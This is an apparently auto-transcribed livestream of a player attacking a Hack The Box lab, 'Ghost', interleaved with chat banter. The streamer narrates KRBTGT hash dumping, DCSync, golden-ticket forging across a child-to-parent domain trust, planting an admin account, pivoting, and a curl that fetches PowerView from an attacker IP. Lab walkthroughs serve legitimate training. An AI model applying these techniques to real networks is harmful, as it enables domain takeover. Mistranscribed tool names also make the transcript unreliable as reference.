what I was doing. And I can't modify it because this fucking shell sucks. No. Yeah. I don't want this. Maybe just corp? Might just be corp. Try it. No. The fuck? How am I gonna get the... Eh? I can't get KBTGT. Capital? I did corp here. Does it need to be capital? There's no way. No, caps don't matter in Windows land. It doesn't work. Why can't I get... Yeah, I should be able to do this. I should be able to get this. I should be able to dump this hash. Alright, I'll just do no specific user. Missing user good. I have to do a specific user? What? Eh? Alright, well, I'll just get the KRBTGT another way. Slash all, that's what I want. It's just slash all. Just fuck it, slash all. Give me all of them. There we go. If you're not gonna let me specify, just give me all of them. There we go, here's KRBTGT. Where? Oh, God, so many. Oh, that's all crap, that's all crap. Guest. Hello, 0. Welcome. KBTGT, where's your freaking... Oh, there it is. I'm past it. What'd you clip? Or am I gonna try to form a golden ticket, though? Let's see. Probably. Yes, we are. We're going to form a golden ticket to access all resources on the parent domain. That's what we're gonna do. So let's scratch these notes. Get this down. KRBTGT. There's a couple things we need here before we going mental. Let me see this, dude. I can't copy it from that fucking thingy. There we go. What is this? I can't. We don't get audio through the VM though. Am I just saying Mimikatz over and over? Hold on, let me hear this from my host machine. Hold on. Let me turn on the host audio for you guys. Mimikat. Mimikatz. I didn't even know I was saying that. Mimikatz. Mimikatz. Okay. Alright. Alright, set a child domain. Exit. Goodbye. Hey! Oh, is this for Power View? This might be in Power View. Might be a Power View font. Oh no, you know what? It's I just need to import Active Directory. Oh no, it's part of Power Exploit. Okay. Let's get Power View on here. I can't do that. Curl 10.10.14.137/powerview.ps1. Using Kali should be update to upgrade that solves the mic and audio issues. I don't know. Me catch. What up, Brumbo? Import this. And now I should be able to get domain sid. Hooray! Alright, got that. Got that. I really said from Power View, I didn't even read. Get domain group to to get the SID of the parent domain. Gulp. That's a lot. Oh, we want the enter. Okay, let's just do this. Server equals ghost.htb. Does that not work? It does work. Hooray! And add oops. Child. There we go. Like my notes. No. Yep, we're good. All right, golden ticket time. What does do this website? What are you talking about? What does do this website? Sorry, sir. I don't know what you're on about. We are corp.ghost.hackthebox. SID, I'm assuming is child SID. This one ends in 8-9. Is that what I had? I don't know. Let's hope. You like kinda British though. Pebble. LOL. No. I am not like British at all. Matter of fact. Give me guts. Bam! Okay, list. Am I in? Am I in the mainframe? I'm in the mainframe. Can I like? I want to like remotely dump. Can you do like remote? Yeah, I can also. Wait, can I? Can I DC sync a specific forest? Can I cross forest DC sync? About the website, it's for what? What website are you talking about, buddy? I don't know what you're talking about. Which website? Oh, I can set the DC server. Notes? Oh, yes. It's remnote is what I'm using for my notes. get help? Can I get help on the DC syntax, please? Okay. I will tell you why. Because he's bad. Yes, that is why. It's just because I'm bad. No. At my school, we use shitty Chromebooks that I can't download anything on, so I have to use something web-based if I want to take notes at school. And that's why I ended up using that. I only really heard about Notion after I used RemNote, so Notion's good as well. Dirty dollar. You right. Good idea. Forgot about that one. You know, I could also PS exec, couldn't I? I could like PS exec into whatever. I'm not gonna worry about that. Oh, yeah, no, it's just my personal notes. Okay. This probably would work, but you're right. Fucking bitch. Rubius? What about Rubius? We could run Rubius if we wanted to. I mean, we're essentially domain admin at this point. Never mind. Why doesn't that work? Heh? Does the share name need to be capitalized? It would say, like, not recognize a share, though, right? Fuck. Fuck. I'm messing everything up. Yeah. What are we doing? We're hacking into the mainframe. You can specify the domain. Mimikatch. Yo, can I get a Mimikatz counter? Someone needs to go through the entire stream and do a Mimikatz counter. / domain. Okay, / domain. We just want ghost.hackthebox. Oops. And then we want user all. No. How did we do it before? How did we just do it before with all users? I'm gonna have to go back now. What do you do now, Jessica guy? / all. What the fuck? Does that work? I don't know. Ghost will be the domain. I failed. Huh? Okay. Our ticket's gone! Our ticket's gone! You're a red team operator? That's cool. Bosses force entirety thing to focus on risk management. Damn. Die. I snatch your ticket, Pebble. Red team consultant. Gotcha. Not operator. What they're basically the same though, am I wrong? What's the main difference? I thought websites for CT. You're talking about a website for... I'm using Hack the Box. If that's what you're talking about. We're on hackthebox.com. You smashed my fucking ticket. Gosh darn. Loopy head. Let me get my ticket back. My golden ticket. Alright, we got my ticket back. Now I should be able to do all this shit that I tried to do earlier. Why did I just close Mimikatz? I wanted to be in there. Here come all the hashes. Yeah! What? Huh? Where are my tickets? Do I need to drop? Know my note? I don't know what you're talking about. The website for my notes? I'm using Remnote. They're not public if you're trying to access my notes, if that's what you're saying. Let me just stay in Mimikatz and not move. Not moving. Can't make me. Huh? It just failed. There we go. You won't touch. It's not about touching, it's about peeping with your eyeballs. That's what it's about. What the fuck's going on here? Where are my tickets going, dude? Okay, can I just export this? How do I export the ticket? And how do I get, like, help on this? Oh, fuck. Let me just export the ticket so I can use it on my host or something. This is not working. Help. Is slash output? I assume it's slash output, but how the frick would I know? Bro, how do I get help on an argument? Slash ticket. Thank you. Okay. And probably instead of passive ticket. Oh, fuck. Alright, just out of here. Ticket equals hacker dot Kirby. Operators heavily skew towards the pen testing side of things, while the consultants more on the risk management side of things, where you basically teach and guide old people and all other people about what cybersecurity is, how to do things, and you never provide technical solutions. Oh. Huh. But how does that involve red teaming at all? Doesn't sound anything remotely to red teaming. Alright. Download. My ticket. I want my ticket. Stop taking it from me. Red teaming isn't pen testing? I know. When I think of red teaming, I think of just pen testing, but more towards the evasion side. I think of... I mean, I guess red teaming at the end of the day is working with the blue team, right? Testing the blue team's capabilities. But you're not even testing the blue team's capabilities with that, are you? You're just... Well, I guess you are. Okay. We have our ticket here. Where's my ticket shit? Kirby TC cache. Whoops. Hacker.Kirby. Hacker.Ccache. Eh? I called it ticket. You're doing red team tests with SOC. But the goal isn't always to find a vulnerability. Gotcha. Yeah, I'm aware human. I'm aware human. Yes, I understand that part. But it's much more cooperative, I guess, with the blue team than pen testing. Alright, we got the Ccache. Export KRB5CC name equals hacker.ccache. Now can I impact it secrets dump dash K. Let's do this. Dash DCIP dash no pass target. Are you feeling me? Yo, refresh your stream. We disabled Defender 10 years ago. Ghost. Oh yeah, because I used -K, didn't I? Yeah, the host name. Still didn't work. Kind of weird. Put an ad in front of it. There we go. There we go. Label link. Stacker. Gotta work. Oh, I had DCIP. Fuck. Dash no pass. No. Use Kcache. What am I doing? Wrong realm. Wait a second. I can't use that here? Bro, what? Alright. Fine, we'll go to my shell. Capitalization doesn't matter. Never has, never will. Dog, I literally... Hey, list. Why doesn't it... It's like... Okay. Hold on. Let me pass the ticket. Bam, bam, bam. Is that what I want? Hold on. Go back. Yeah, that is what I want. Unless I swapped Sid and Sids on accident, and I shouldn't have. Wait, this isn't right. Oh no, it is right. Unless I still swapped Sid. I don't think I did. Wiped cleanup script? What's my estimation on Discord? Run the command DMs. I'll check in a sec. That is imported now. So I still should be able to dir DC01. See? Dude, I'm actually about to ban you right now. Stop spam. Wait, I have Discord audio on. Or desktop audio. You goober. Everyone heard that. Or the C dollar. What am I doing? It's C dollar. What? Do I need the fully qualified? Oh my gosh. Yo, my bad, chat. No, it's his bad. Get him banned. Perma banned. Gone. How does this not exist? Huh? Doesn't matter though. I should still be able to DC sync across domains anyways. K-list, is it gone? Imagine. It's fucking gone. It wipes it instantly. These freaking goobers over here. Just do Ghost Administrator. Ghost.hackthebox. I don't know why that's fucking feeling. What did you send me? I already ran that. I already ran that. I'll run it again just to prove you wrong. Happy birthday. What up? Gunner box. Alright, we're literally on the very last step. No, you didn't. Not with... Yes, I did with that fully qualified distinguished name. Oh my... This guy, bro. Yo, you're just sad. Okay. Can I K-list with inside here? No, I can't. Oh my gosh. What is coffee? Don't make me a coffee? Okay. I hate Mimikatz, dude. And our ticket's fucking gone. It just wiped from the earth instantly. Do I have to actually run this like back to back like I'm Usain Bolt? Not all of them. Bam. No, doesn't fix it. Why is that failing? I did the whole child to parent thing correctly, right? Oh, I didn't even read this. This is only for extra SIDS attack. This may not even be the case. Bro's still talking about Rubius. Did I talk with Activox? Oh no, I haven't. Still need to. Still need to. Forgot about that. No, this should work. We have KBTGT. We have child domain. We have the domain group for enterprise admins. Wait, that was in the parent domain that we did that for, right? It's probably so far back. No, it's not. Is it? No, it's not. Yeah, I know. I'm just making sure we did it for the parent domain and not this domain. I'm assuming we did it correctly, but I just want to make sure. Get domain to get group. That's it. But we want that one. I want the one right after here. Yeah, this is for Ghost. This is the enterprise admins. This is right. Jeez. 6. Yeah, this is the right one. Why does that fail? I mean, it doesn't fail. We have a valid ticket. Why not do it remote? What do you mean, why not do what remote? Why are we getting permission to not? My fucking ticket's gone, so. Let me do this. DCO1 dot ghost dot hackthebox / c dot. This is denied. Our ticket still. Why does the ticket instantly disappear? Instantly. Just gone. K-list. Boom. It's gone. Right after we do it anyways. Do I have to downgrade? Oh, I have to be in command. I don't in command prompt. I can't be in PowerShell. I think. Still confused why I can't access that though. This should be fine. Am I tweaking? I'm not tweaking. Did it break? No. Oh, what up, Ryan? Brian broke Twitch chat. Ryan came in here in my Twitch chat thing, but my multi-stream Twitch chat broke. It's your fault, Ryan. As always, as usual. Alright, what are y'all saying? Mimi Cats hates me back. Nice. Bro wanted DA and he got a cup of Joe instead. I currently do not have an active live. Alright, my multi-chat is fucking broken. Lovely. I'm gonna restart it, see what happens. Alright, yada yada yada. On a scale of 1 to 10, how mad would you be if I said skill issue? Ryan, I got a suggestion for you. For VIP Plus, since it's private instances, remove cleanup scripts. Just remove them. There's no need for them. It's just such a pain in the ass for everyone with VIP Plus. Just remove the cleanup scripts. Thank you. W, just a guy. Better gear for next stream so chat won't break again. Yes. Move cleanups. It'd be a huge pain in the ass. It would. I know it would require maintaining 2 separate images, but is that big of a deal? It's just boot a different image for VIP Plus. Like, is it that hard? Okay, I've restarted the... Okay, we're good. We're up now. Chatbot's back up. We're good. Two X space taken up to... Oh, that is true. Yeah, that is true. But it is annoying. I don't know. Something in the... I don't know. It'd be a lifesaver if there was a way to figure that out. Alright, I'm still on this shit. I don't know why this fucking ticket won't work. Because I have a valid ticket. Hey list, it's imported. It's gone now. Because it's freaking cleanup and shit. I think. Bada bing. Bada bing. I already have the whole thing running, whatever. Bada boom. Bada boom, it's in. Bada boom. Doesn't work though. Why don't you work? Why don't you work? It's fucking gone again. Like, oh my gosh. I can't even tell what's the problem. Okay, it's still imported. Alright. So it's an issue with my ticket. Which doesn't make any sense, because this should be valid. I mean, the SIDs are right. I don't know what else it could be. This should be fine. Do I need to look for other things? It doesn't matter. You can, we're just, it can be anything. It can be a non-existent account. Let's try this. Main controller and credentials for administrator in child domain. Descript do the rest. What if we try raise child? I don't know if that'll work. I want to try this though. We have already done this. Oh, I know why. It's this shit. Let's go back with our ticket. Let's go back here. It's this. You gotta do it like this. Can I explain what I'm doing right now? Hopefully. I am abusing an Active Directory child to parent domain trust I guess vulnerability to escalate to the parent domain. Hopefully that made sense. corp.ghost.hackthebox. And now we want dco1 dot corp.hackthebox. This doesn't fucking work. Why? Do I have to set up realm? Do I have to set up fucking etc KRB conf? I had a tool that sets it up. I forget where it went. KRB conf setup tool. There is a tool to do this, I know that. Oh, actually, one netexec does it. Now there's a netexec module to do it. Yo, what? Threads. Use any of these. NetExec SB, yeah, sure. Dash U, dash P. There should be one for KRB. Just generate KRB5 file. Oh my god, that's great. etc/KRB. Oh, we need sudo, yeah. Lovely. Alright, please work. Fuck. Azem Zemi with the follow. Thank you. Wrong realm? How is it wrong realm? How is it an issue with realm? Because there's two separate hosts, and I can't hit the, I know why. It's because it's two separate hosts. I can't hit corp from externally. That's my guess. I think. I mean, it still should have worked from the whole Mimikatz method. No, it should work. Shouldn't matter. I shouldn't need to even hit this. Never mind. What am I talking about? We have a valid ticket for it. Alvaro, thanks for the follow. If I set the host. Matter. Oh my gosh, I'm doing corp.hackthebox. It's ghost.hackthebox. Fucking hell. Still didn't fix it. Target IP. Can you change the avatar of my Discord channel from that black image to something else? Like what? I don't know. I don't even know what to put it. Why am I still getting wrong realm? This is... most upsetty spaghetti I've ever been. What does my Caribbean Kai 5 conf look like? That looks fine. Looks fine. Wait. Ed, etc. Host. Oh, I do have DC1 Ghost in here. It's wrong. I'm not doing that. I'm not doing that. I'm not doing that. I think the black image is tough, in my opinion. It's just gonna be some black dude in the military. If I do that, I'm not doing that. Alright, I'm tweaking out. This is like... this should be one of the simpler parts. Let's just try Race Child. Is this part of Impact It? It is. Target exec. The target host you want to PS exec against once the main attack is finished. That's DC01 dot ghost.hackthebox. W-K dash no pass. Target. What is target? What do I set target to? The child DC? But we can't reach the child DC, that's the problem. I'm gonna have to pivot, aren't I? I'm doing it this way, I'm gonna have to pivot. Thank you. There's an easy way to pivot with... supposedly easy way to pivot with, Interpreter, right? Pivoting, tunneling. Interpreter. I guess I could use a SOX proxy. Guess that would work. Sure, and they'll just run this with proxy chains. I don't know why version should be fine. Have any thoughts on Black Ark? No thoughts. No thoughts. No specific thoughts. Set session 1. Do I always stream this much? No. No, I'm only streaming this week a lot because, well, actually, I just finished school, so I'll be streaming a lot more. Now since school's over, but I am out of town, for like 10 days after today, so won't be streaming for the next 10 days for sure. That subnet. Probably this. Can you find a job easily? Depends what kind of job. Thanks, Brumbo. Can't type for shit. Now what I want. On target. So that's just gonna be this IP address. I need to route to a different... Fuck, I forgot we broke proxy chains, dude. We destroyed proxy chains or a while ago. No. Okay. Proxy chains 3 works. Whatever. We'll use that. Domain should be specified. Hack the box. Well, how do I set the domain? It's not. What? Where do you want me to specify the domain, brother? Probably here. I did dash no pass, and you're giving me a password prompt. Give me an example. Let me just see this trust thing on GoAd. Okay. Can I just make... I don't know if I can make a domain account. I can make a local user account and add it to the administrators group. Is that good enough? You said you finished school, so you're going to get a job. That's the plan, yes. Finals ends next week. Good luck, Omar. Okay, add AD user. And domain admin. Oh, we need to make one first. Alright. AD user. Might need to import Active Directory module. What's going on here? Oh. Bro, what's the syntax for this shit? It's not prompting me. Do it this way. Okay, dash name Pebble. Cool. Dawn, net user. We have Pebble. I added a dash help user on accident. Fuck. Okay. Alright, now it needs to be added to domain admins. Gosh darn it. Fine, I will start it. Members. Okay, so I should be good here. Let me fix this. This should be corp. Corp's gonna be under separate IP address here. Actually, it doesn't really matter, does it? We just want gave us the example, didn't it? Here. So now can I just do... Oh, I didn't set a password for it. What the fuck is its password? What? Hold on. What's the IP address? Dash U, Pebble, dash P, nothing? I didn't set this proxy chains. Practice some quiet mode. Proxy chains. Account disabled. Okay. Enable, enable AD. Enable AD account and set password. Enable account level. Roxor with the follow, thank you. Alright, how about bro? Alright, oh fuck. Dude, I hate this. I hate interpreter, man. Worst. It's just the worst. And that's not a skill issue. There's no dash password. That AD account password. Server C2 is the best. Okay. Well, apparently the tool doesn't work for Server T2. That we used to get a shell because we had to do some obfuscation. We'll see. Okay, here we go. Let's do this in here so I can actually edit it. You motherfucker. Give me this. Double password. Password 1, 2, 3. Great password. You happy now? Yeah. Alright, enable this account, please. Cool. We're good? Okay. There should be domain admin on the child domain. So now I should just be able to use this. I just set a host name for it, so okay. What's the... Keep forgetting it. Let's just copy this. This is corp.ghost.hackthebox. corp.ghost.hackthebox. Username, password. Rebel. Password 123. Corp.ghost.hackthebox doesn't exist. Sorry, I just added it as an entry. What do you mean it doesn't exist? What the fuck are you talking about? It doesn't exist. Oh, ghost.hackthebox doesn't exist. Why is it saying ghost doesn't exist? What? Target exec. I don't know if that will work. DCO1 dot ghost dot hackthebox. This doesn't exist. What do you mean? Fuck you, proxy chains. Oh, wait, we did disable. Yo, chat, we disabled Defender. I'm just gonna use Sliver now. Don't do it, Ryan. Don't you do it. No. Don't you even do it. Is there a... Okay, if there's not a specific, like, commanded to automate this in Sliver, then I'm not gonna use it. Is there a way to... Is there even a way to do that? There's no specific command to get from child to parent, is there? I would just be having to do it the way I am right now. That doesn't help me at all. Why are you saying this host doesn't exist, dude? You're saying none of this exists. How? How could you say that? Okay, like, all right, we've spent like 2 hours on this same point. Am I right or am I right? I literally have to go like soon. What the fuck? We're done with that. We're way done with that. We just... Bro, we're literally domain admin on the child. Like, it should be this simple. I don't care if I do it from Windows or Linux or whatever. If I do it from Linux, I have to pivot and tunnel. Whatever. Don't care. That should not matter. We already know the trust between these. That these are trusted. It should work. Why is it not working? I mean, I guess I'll do it through Linux. Fine. It doesn't make sense though, because we already have a valid ticket as well. Let me go back to this. Now that we've pivoted. Now that we've kind of pivoted. Why is proxy chains doing that? Why is this thing... Why can't DNS work with proxy chains 3? And why can't I use proxy chains regularly? I broke my proxy chains. Sudo apt install proxy chains. Can't type. I'm already on this new, like, purge. Right? Oh, it is broken. I broke it like a week ago. It is broken. It is completely broken. It doesn't work. Look at this. I get segmentation fault. Like, where is this even coming from? I just purged it. Where are you? Like, why are you there? Like, get out of here, bro. And I get segmentation fault again. I broke proxy chain somehow permanently. There's nothing to do with my config file. I don't even know what I did. I just copied something from Stack Overflow and then it fucked my proxy chain. That's what happened. Logolo? Will Logolo help here? Yes, I could use Logolo here. You're right. Yeah, I'm gonna just use Logolo. I can use Logolo here. That's fine. We can do that. We can use Logolo. That's fine by me. Actually, we can auto route as well, which is fucking nice now. Big noise for the auto route. Bam. Fuck, I want to sudo. Shut up, I don't know what I was thinking there. I just wanted to see the command again. Auto It should be tunneling. So now I should be able to ping this. Nice. Big noise. She's been revoked. Okay. This is not a bad sign here. This just means our ticket probably expired. Let's go back to, free child. Huh. Why is it still failing? TGT's been revoked. Why is TGT being revoked here? Huh? Is it not like what? What is going on with this? Copying this in ChatGPT. What the fuck? Wants me to forge a golden ticket locally. Ray's child does that, though. Ray's child does that. Does it not? Maybe not. Let's just do it. Okay, let's do that. Fine. Domains, not that. Well, I have child from Linux. Anti-hash domain SID. Extra SID. Hacker. Fine. Sure. Can't type. Corp.ghost.local. Domain SID. Here. Extra SID. Happy birthday. All right, later, just a guy. Hey, appreciate it for stopping by. No worries. Okay, well, that got a ticket. Now principal unknown? Can I just set it to administrator? Shouldn't matter. It can be anything. What the fuck is going on? Alright. I'm gonna have to go soon, like real soon. We haven't looked at a write-up this entire box. I want to get through the insane box without looking at a write-up. Gosh, we're so close. I don't know why this ticket doesn't work. Where's back to the, Secret stump. Why are you failing? No. You. Bingus. I mean, alright, I have to... What time is it? I gotta go. I have to go. I'm looking at the right up for the very last step. It's fine. This is a great box. Huh? Anti-authority, yeah. Domain trust, yeah. Bidirectional. Was it not a child thing? Was it just cross forest? No. It is a child. What up, Tabora? Yeah, we did that. We did that. We literally did this. I mean, like, what? We did exactly this, except we used Mimicat instead of Rubius. I don't even know. Why did that fail? I guess I'll use Rubius. I mean, fine. Like, jeez. Alright, just weird. Still Ghost, still Ghost. I don't know why, but I guess I have to use Rubius for this to work, even though I literally did with Mimikatz. So I spell Rubius. Oh my gosh. Yes. Rub. Without operation? I actually can't type. Yes. Hacker bite with the follow, thank you. Rub. That did not copy well at all. Okay, if this... Okay, let's... If this fucking works now... Oh, dir dc01 dot ghost dot hackthebox slash c dollar. Permission denied. Yeah, this didn't work. Like, what? Didn't work. Doesn't exist. Do they want... What? Why is that saying it's not exist? It is DCO1, right? It is DCO1. Apps shouldn't matter. What? It doesn't exist. I mean... This is just whack. Ticket's gone. Dude, I hate this shit. I mean, it doesn't matter. We literally did this with Mimikatz earlier. We're having the same problem. I'm literally copy-pasting from the write-up, and it doesn't fix it. The lab's broken. Ryan, if you're still here, it's your fault. Copy pasting from the right up. It don't fix it. Yep, permission denied. I copy paste from the right up. Yep. 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 Imported the administrator ticket right into. Yep. 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 You'd think. You'd think. But no. Type. No, it's not locally. Or not locally. I'm assuming KBTGT may have changed. So I will, as a double check, we'll go ahead and dump that again. Actually, I could probably just go up and grab it. Yeah, it's right here. The AES instead of NTLM. By kit. Okay, fine. What is the command to do it? It's just DC sync. Okay, user. Sure. Here's this. Here's my Rubius command. Yep, it's the exact same. Yeah, no, I literally copy paste from the right up. Box is broken. Ryan's fault. He's not here, but it's still his fault. I just spent 2 hours on something that was broken from the get-go. Alright, cool. Sometimes, chat, the box is broken. And you gotta learn to restart it. That's a good tip. That's a good tip. Learn to restart the exam if you're taking any exams. How's it going? We're about to end stream. I just spent 2 hours trying a privesc, only to copy paste from the write up and to not work because the box is broken. If I revert it, it might work. I don't know. I tried it like 3 different ways over the course of 2 hours, and that was interesting. All right, that was for sure interesting. But anyways, chat. Hope you guys have enjoyed today's stream. I will not be live all of next week or the following weekend because I will be out of town. Who's live right now? Only me. Apparently, what is she doing? Chat, who are we rating? I don't even know anyone live that's doing anything like hacking related. Chat, who do we raid right now? Huh? I'll probably just raid Martino Eduardo. I'm searching hacking on Twitch. Speedrunning Pico CTF. Okay. Cyber Snail. Let's get this dude a raid. Dude, let's give this guy a raid. Alright, fuck it. We're raiding Cyber Snail. Alright, he's doing Pico CTF. Alright, chat. Thanks everyone for the biddies, follows, donos, subs. And everyone here just came with your boy trying to learn something new. Today I'm gonna say we finished Ghost. I'm saying we finished it. We did. Doesn't matter. Box was broken at the end. Sometimes that's how it be. How's everyone on YouTube doing? Everyone's alright. Alright, I'll see y'all later. Again, I'm gonna be out for a while. So, take care. Don't do anything stupid without me, alright? Later, chat.